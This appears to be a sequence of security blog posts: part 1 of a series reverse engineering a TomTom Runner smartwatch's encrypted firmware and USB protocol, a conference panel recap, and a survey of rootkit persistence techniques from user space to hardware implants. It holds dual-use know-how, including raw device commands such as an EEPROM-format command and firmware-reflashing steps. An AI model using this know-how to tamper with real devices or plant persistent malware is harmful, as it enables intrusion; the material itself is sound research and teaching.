I’ll show you how it was done on the third (and final) post in this series, due to come out (hopefully) next week. Stay tuned.

Hacking Smartwatches - the TomTom Runner, part 1

tl;dr: this is a series of posts about embedded firmware hacking and reverse engineering of an IoT device, a TomTom Runner GPS Smartwatch. Slide decks of this work will be available here when I complete this series.

hacked by kossak

While specialization is key in most areas, I feel that in the field of information security too much specialization leads to tunnel vision and a lack of perspective. This blog is my attempt to familiarize myself with areas where I’m usually not comfortable.

This series of posts will focus on a subject that I really sucked at until the last couple of months: reverse engineering of embedded systems.

01. Introduction

I will show you how I hacked a TomTom Runner GPS Smartwatch, by:

  • Finding a memory corruption vulnerability exploitable via USB and possibly bluetooth (if paired);
  • Taking advantage of said vulnerability to gain access to its encrypted firmware;
  • Doing all this without ever laying a screwdriver near the device (no physical tampering).

After reading about the epic hacking of the Chrysler Jeep by Charlie Miller and Chris Valasek, and getting to watch their talk at Defcon this year (seriously, go watch it if you haven’t already), I felt really jealous because I wanted to be able to do that, so I got to work.

02. Motivations

Apart from the “hacker tingles” you get from hacking devices that exist in the real world, as opposed to hacking abstract computer software or web applications, there were some other reasons that got me into IoT hacking and motivated me to start reverse engineering such a device:

  • Simpler architectures: Usually embedded devices have much less complex hardware and software than a general purpose computer or a smartphone/tablet with a complex OS;
  • Fewer attack mitigations: These things usually lack memory protections such as ASLR, DEP, stack canaries, etc.;
  • ARM Architecture: I had some previous experience in x86/x64 reversing, but coming back to it, I feel that learning ARM is probably more important now than the Intel architectures, because of Android, iOS, smartphones and tablets;
  • Charlie Miller and Chris Valasek made it look easy :)

Then there’s the obvious buzzword of the year, The Internet of Things. Buzz aside, I feel that we’re really getting to the point where every electronic device is generating data and sharing it with the world.

We’re converging to a hyper-connected world, in the likes of a movie that really made an impression on me while growing up: Ghost in The Shell. The characters in the movie are so much surrounded (and implanted) with technology that they don’t even need to move their lips to talk – their thoughts are wirelessly transmitted to each other. We’re getting closer to that fascinating (and scary) future.

03. Research

So I looked around my house for devices I could start hacking. Found these:

Volkswagen RCD510:

VW RCD510
This is my car’s head unit, as seen in some VW cars. I started looking at this before VW’s Diesel scandal, but while this looks like a cool challenge, there are some logistical concerns: I use the car everyday and can’t afford to “crash” it. Car hacking is a booming field though, might be something I’ll return to later.

A-Rival Spoq SQ-100

Spoq SQ-100
This is a GPS sportswatch more suited for trail running. It is actually easier to hack than the TomTom, because the firmware is not encrypted. But the watch didn’t interest me much because it’s based on an AVR architecture (as opposed to ARM), doesn’t have Bluetooth, and isn’t very popular. Might come back to it later, though.

The TomTom Runner

TomTom Runner
The TomTom Runner is a cooler watch. If you’re looking for a good and cheap GPS running watch, this is it. It has Bluetooth Low Energy, an ARM processor, and TomTom is really pushing into a market mostly dominated by Garmin, so let’s keep investigating.

The first thing I did was to download the firmware for all these devices. Firmware for these devices can usually be found on the manufacturer’s web site, user forums etc.

Analyzing the firmware files for these devices was done using binwalk. The results were discouraging: out of the three devices, two had their main firmware encrypted with a 16-byte block cipher (probably AES). It appears that most firmware these days is distributed encrypted.

04. Attack Surface

I chose the TomTom, so the next thing to do was to look at it from a hacker’s perspective. I’m good at breaking things but not so good at putting them back together, and since I use the watch regularly for its intended purpose, I made a promise to myself not to try to open it and attempt any sort of hardware hacking via JTAG/Debug pins. Also there would likely be at least some protections and it’s a steep learning curve with some penalty for error.

So what are our options from an external perspective? I figured these were the attack vectors:

  • User Interface: You can use the four-way D-Pad to try and attack the device. I tried, and failed.
  • GPS: If you have a HackRF or similar you could possibly attack the device via its GPS receiver, but I really don’t see the point of it :)
  • Bluetooth: The device has a Bluetooth interface that works similarly to USB at the protocol level. From what I read it is possible to interface with it in a way similar to USB, as long as the device is paired. This could be done using ttblue.
  • USB Interface: This was the preferred attack method. More on this later.

05. Firmware

So step one of hacking any device is trying to get to its software. I did that by looking at how the official TomTom software updates the watch’s Firmware:

TomTom Software

Using Wireshark and forcing an update one can find the location of the firmware files:

TomTom Software

For the observant: yes, this is a regular HTTP page, no SSL. Remember this later.

There are lots of files here, the ones that matter to us are:

  • 0x000000F0 is the main Firmware file;
  • 0x0081000* are language resource files (eng / ger / por / etc.)

There were other files: device configuration files, firmware for the GPS and BLE modules. These last two are unencrypted but were not very interesting.

The largest file (around 400kb) is 0x000000F0 and looks like the main firmware. Looking at it with binwalk gave us this:

$ binwalk -BEH 0x000000F0

DECIMAL       HEXADECIMAL     HEURISTIC ENTROPY ANALYSIS
--------------------------------------------------------------------------------
1024          0x400           High entropy data, best guess: encrypted, size: 470544, 0 low entropy blocks

binwalk entropy graph

Want further proof that this is encrypted? Check out this comparison of two different firmware versions, using vbindiff:

vbindiff

Note that:

  • Files differ in 16-byte blocks
  • There are blocks that are equal interleaved with blocks that are different

This means it’s very likely that this is some sort of block cipher in ECB Mode. The most common 16-byte block cipher, by far, is (you guessed it) AES.
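You can see the same thing programmatically by comparing the two versions in 16-byte blocks; a quick sketch:

def compare_blocks(path_a, path_b, bsize=16):
    """Count identical vs. differing 16-byte blocks between two firmware versions."""
    a = open(path_a, 'rb').read()
    b = open(path_b, 'rb').read()
    same = diff = 0
    for i in range(0, min(len(a), len(b)), bsize):
        if a[i:i+bsize] == b[i:i+bsize]:
            same += 1
        else:
            diff += 1
    return same, diff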

Let’s take a step back for now regarding firmware analysis. Let’s look at what we can learn about the device’s hardware.

06. Hardware

What can we learn about the watch hardware without opening it? This is probably old news to veteran reverse engineers, but here goes: pretty much any RF-emitting device sold in the United States is tested by the FCC, which eventually publishes a report containing all sorts of juicy information and photos.

There’s a nice search engine for FCC report data (the official site seems purposefully obtuse) by Dominic Spill; you just need the FCC ID (S4L8RS00 in our case). Here is the obligatory full frontal nude photo of our device, courtesy of the FCC:

FCC internal photo

The big black chips are:

  • Micron N25Q032A13ESC40F: This is a serial EEPROM with 4MB capacity. It’s the “hard-drive” of the device, where the exercise files are stored, among other things.
  • Texas Instruments CC2541: This is the Bluetooth chip.
  • Atmel ATSAM4S8C: Micro-Controller Unit (MCU). This is the “brain” of the device, and contains:
    - A Cortex-M4 ARM core
    - 512 kb of Flash memory, where the firmware and bootloader reside
    - 128 kb of RAM

The GPS chip is soldered on a daughterboard near the D-PAD.

This information will be useful later on. Since now we have a good enough picture of the device’s innards, let’s move on.

A sidenote: that Atmel PDF datasheet I linked above was my bedside reading for a long time. If you’re starting out as a hardware reverse engineer, you really should embrace the datasheet. This one’s pretty thorough, which made for a nice experience. Hooray for Atmel :)

07. USB Communications

Much of the work here had already been cut out for me: there’s already a nice piece of open source software that does most things the official TomTom Windows software does. You can check it out here: ttwatch.

I looked at the source which is very easy to read. If you compile it with ./configure --with-unsafe you’ll get a few additional nifty command line options. Turns out that a lot of the USB communication with the watch is simply read / write commands to its internal EEPROM.

I did some more investigation regarding USB, and made a crude fork of ttwatch that removes some sanity checks and implements a new tool, ttdiag, to send/receive raw packets to/from the device. I also used USBPcap on Windows to record the communication between the device and the TomTom MySports Connect software.

These investigations led me to a lot of interesting and undocumented USB commands for the device. The USB communication is quite simple, with each command composed of at least the following four bytes:


09 02 01 0E

"09" -> Indicates a command to the watch (preamble)
"02" -> Size of message
"01" -> sequence number. Should increment after each command.
"0E" -> Actual command byte (this one formats the EEPROM)

Some commands have arguments, such as file contents, etc. Since each command is a single byte, it was easy to cycle through all possible commands. The full list is available here. There were some interesting commands, such as a hidden test menu, a command that took “screenshots” of the device and saved them on the EEPROM, etc. Here is the test menu testing the accelerometer sensor:

Accelerometer Test

Most of the commands to/from the watch involve reading / writing to the 4MB EEPROM we saw earlier. ttwatch already does that for us. We can read, write and list files:

root@kali:~/usb# ttwatch -l
0x00000030: 16072
0x00810004: 4198
0x00810005: 4136
0x00810009: 3968
0x0081000b: 3980
0x0081000a: 4152
0x0081000e: 3957
0x0081000f: 4156
0x0081000c: 4003
0x00810002: 4115
[...]

root@kali:~/usb# ttwatch -r 0x00f20000
<?xml version="1.0" encoding="UTF-8"?>
<preferences version="1" modified="seg set 21 13:34:28 2015">
    <ephemerisModified>0</ephemerisModified>
    <SyncTimeToPC>1</SyncTimeToPC>
    <SendAnonymousData>1</SendAnonymousData>
    <WatchWindowMinimized>0</WatchWindowMinimized>
    <watchName>lgrangeia</watchName>
    <ConfigURL>https://mysports.tomtom.com/service/config/config.json</ConfigURL>
    <exporters>
    </exporters>
</preferences>

Turns out that if you write the firmware file you saw earlier from download.tomtom.com, the next time you unplug the watch from USB it will reboot and reflash the file, assuming it is a valid firmware file.

08. To be continued…

This is turning out to be a long post, so I won’t keep you any longer today. I will keep my promise and show you how I exploited this watch and extracted / modified its firmware. The next post will be about finding that memory corruption bug and controlling execution.

On Risk Management and Policies, C-Days 2015

Earlier this October I attended C-Days 2015, an annual conference on cyber security, organized by CNCS.

It was a very interesting conference, mostly because it gathered in the same room some interesting and different people from the information security field, and – a rare thing for a Portuguese infosec conference – did so with almost no vendor talks promoting the next great product/service xyz.

I had the honor of being invited to talk on a panel with the theme “Risk Management & Policies – No shortcuts for security”, alongside Fernando Fevereiro Mendes.

The talk was recorded and is available on YouTube. It’s in Portuguese and a bit long, so here are the main topics I talked about:

  • Attacker methodologies are fairly unchanged over the years because defenders are so slow to adapt; how do we close the gap between a successful attack strategy and successful defense strategy?

  • There’s still a gap between “tech geeks” and “strategists” and these two groups snub and devalue each other’s work. This divorce between strategy and operations is one of the biggest setbacks for a good security posture;

  • Security products are a risk in themselves. Here in Portugal we rely more on products than on know-how. Products increase complexity and risk, and are not agile: When a security product reaches maturity required to be effective, attackers have already moved on to the next attack.

  • I basically concluded saying we need more “disrupters” in the infosec field in Portugal. We need to bring the hacker / breaker spirit to big organizations and put them to good use: test security policies by running red team exercises, security audits, phishing campaigns, and try new attack methods. If we snub hackers that want to help organizations we will be blind and unprepared to the real attackers when they hit.

Here is the video in full. I start at around the 17m mark.

I was also present at B-Sides Lisbon earlier this year which was also great, and a bit more comfortable for me, a true “hacker conference”. I hope next year the audience for both these conferences will be pretty much the same. It would be a good sign of maturity for the industry.

IncePCtion - Recap on persistence techniques on modern desktop PCs

After coming back from my first DefCon and having attended several talks that circled around variations of this topic, I realized I needed to write this post in order to consolidate my knowledge on the topic of persistence techniques. Hopefully this will be useful to others.

Modern PCs are increasingly complex, and so are their operating systems. It’s important to understand the abundance of ways an attacker can achieve persistence after compromising a computer.

My objective with this post is to enumerate all the different ways persistence can be achieved after compromising a desktop computer (Windows/Linux/OSX) in a generic form. Instead of repeating the work of others, I’ll refer to the more technical articles as needed.

So without further ado, let’s start the inception process. We’ll start from the surface and will gradually dive deeper and deeper into the system’s “subconscious” states.

1. User-space persistence

It’s the oldest and still the most common form of persistence. On Unix/Linux systems this usually means patching some SUID binary or service. On Windows systems it usually means running a malicious process in the background on system startup. I’d argue it’s also the easiest to detect, but it is still extremely effective in most cases.

This is your standard userspace (ring 3) rootkit.

2. Kernel-space persistence

This technique involves loading a kernel module or driver into kernel memory, so that the malicious code runs without most of the OS restrictions. It usually involves patching a kernel function or service.
While harder to detect, since it runs in kernel space, this mechanism still requires the modification of operating system files (a malicious driver, kernel module, etc.).

This is your typical “ring 0” rootkit.

3. Virtual Machine Based Rootkit

This is more commonly known as the Blue Pill attack, made famous by Joanna Rutkowska in 2006. This technique involves using the CPU’s built-in virtualization helpers (AMD-V, Intel’s VT-x) to create a thin hypervisor/VMM that sits between the OS’s and the host machine. Hardware interrupts and nearly any other computer function can be handled by the VMM, so malicious code can be executed this way and hidden from all levels of the OS.

Note that some recent OSes already use VMMs natively for compartmentalization. For instance, Windows 10 uses a thin hypervisor to isolate the security module that holds the user’s credentials (LSASS) in a separate VM, away from the main OS. This means that not even ring 0 code running in the main OS can access the VM that holds the LSASS process.

This is also called a “ring -1” rootkit.

4. BIOS / UEFI patching

This method involves patching the BIOS firmware in order to achieve persistence. It usually needs another method to interact with the OS, such as malicious userland code that takes advantage of the patched BIOS functions.
Usually the BIOS is write-protected during OS execution and its update process uses signature verification, but sometimes vulnerabilities are found in that process that allow rogue firmware modifications.

There are several ways of achieving persistence by modifying BIOS code and most of the other low level persistence techniques require this. A simple form of BIOS persistence is the modification of the S3 Boot Scripts table to include malicious code that gets executed when the system resumes from sleep.

My fellow Portuguese researcher @osxreverser found an interesting bug in most of Apple’s MacBook laptops that allows patching the firmware from the operating system. This of course should not be possible, but most PC architectures still have insecure or buggy BIOS upgrade paths.

On this topic it is worth mentioning yet another blunder by Lenovo: It was recently discovered that they use a special ACPI table stored in the BIOS called Windows Platform Binary Table to install a persistent “rootkit” on some of their retail machines.

Also make sure to read about the curious case of BadBIOS.

5. GPU / Ethernet / Option ROM patching

The BIOS / UEFI is not the only non-volatile code that is executed each time your computer starts. Every device connected to the PCI bus is handed execution flow by the BIOS on startup. The idea is to load drivers into memory, set up the hardware, handle the PXE boot process, etc. The firmware of these devices can also be patched to achieve persistence.

Notorious examples are GPU rootkits such as jellyfish and Demon, Ethernet firmware rootkits, etc.

6. SMM Rootkits

System Management Mode (SMM) is a special mode of execution in modern PCs used to handle special hardware functions like power management, system hardware control, or proprietary OEM-designed code. Usually, an SMI interrupt is triggered by a hardware function and the CPU enters a special mode of execution. Note that this special SMI interrupt cannot be caught by the operating system. While in SMM mode, a special block of memory (the SMRAM) can be read or written to, remaining protected from the OS. The rootkit works by patching/backdooring the SMI handler that exists in SMRAM.

Make sure to read this paper for more information.

This is also called a “ring -2” rootkit.

7. Active Management Engine Rootkits

Most business PC architectures have a dedicated processor running in parallel to the main CPU, providing administrative functions and special remote access. Most notably, Intel’s vPro architecture has a dedicated (non-IA32) CPU with access to dedicated DRAM and direct access to the network card. The software that runs all this is stored in the BIOS chip and can be modified to achieve persistence.

This is fundamentally different from SMM rootkits because the persistent code is going to run on a physically distinct processor, not on the main CPU.

These slides talk extensively about the Intel AMT architecture and how to attack it.

Some PC’s also include what’s called a Baseboard Management Controller (BMC) that runs a special protocol (IPMI) designed to remotely manage the system. This is also independent from the main OS and CPU, and could be backdoored to achieve persistence. For more information on BMC and IPMI it is useful to refer to the research done by HD Moore here.

These are also known as “ring -3” rootkits.

8. Peripheral controllers

An elegant form of persistence is patching the firmware of peripherals of the system, such as USB controllers, Hard Drive controllers, keyboard controllers, LTE / 4G cards, etc.

This is a particularly elegant way of persistence because the main CPU and/or BIOS does not have an easy way of verifying the code running on peripheral hardware. Also, most of these peripherals have vulnerable firmware update paths that facilitate backdooring.

There is interesting work published on this topic:

  • LTE / 4G: great presentation on Defcon 23 on patching a LTE module of a PC/Tablet to achieve persistence.
  • BadUSB: Research led by Karsten Nohl that uses “evil” USB peripherals to flash and persist on USB controller firmware.
  • Hard Drive Controllers: The recent paper on the Equation Group by Kaspersky details the backdooring of hard drive controller chips. There is also a public presentation on this topic from 2013, linked here.

9. CPU Microcode

The Intel CPU has microcode that contains the low-level code dictating how it executes its opcodes. This microcode can be updated from the original version that was “burned” into the CPU. Usually these microcode updates are applied by the firmware, because they are not persistent (they must be reapplied on every reboot), but they can also be applied by the operating system.

To prevent tampering, Intel has verifications in place that prevent the loading of malicious microcode. The Intel microcode update process has been thoroughly investigated by Ben Hawkes in this great paper.

As far as I know no similar research exists for the AMD microcode update process.

If an attacker could modify the CPU’s microcode, persistence could be achieved by implementing a special CPU opcode, or patching an existing one, that removes security restrictions for a given OS process when the opcode is called with the correct parameters.

It’s a theoretical possibility that Intel, AMD or a state-sponsored actor such as the NSA could have such a backdoor in place.

10. Hardware based implants

Finally, a passing reference to the lowest possible form of backdooring: having access to the hardware and modifying it. The leaked NSA files show that they implanted systems by inserting devices into them: JTAG implants, console ports, Ethernet ports, etc.

This remains outside of the realm of possibility for most attackers but is extremely hard to detect if done well.

Conclusion

After putting all this together it seems amazing that there are so many mechanisms to hide the presence of an attacker inside a modern PC.

I’ve tried to make this post as complete as possible, but it’s possible that I missed something. DM or mention me at @lgrangeia with links to other work and / or persistence mechanisms and I’ll update this post accordingly.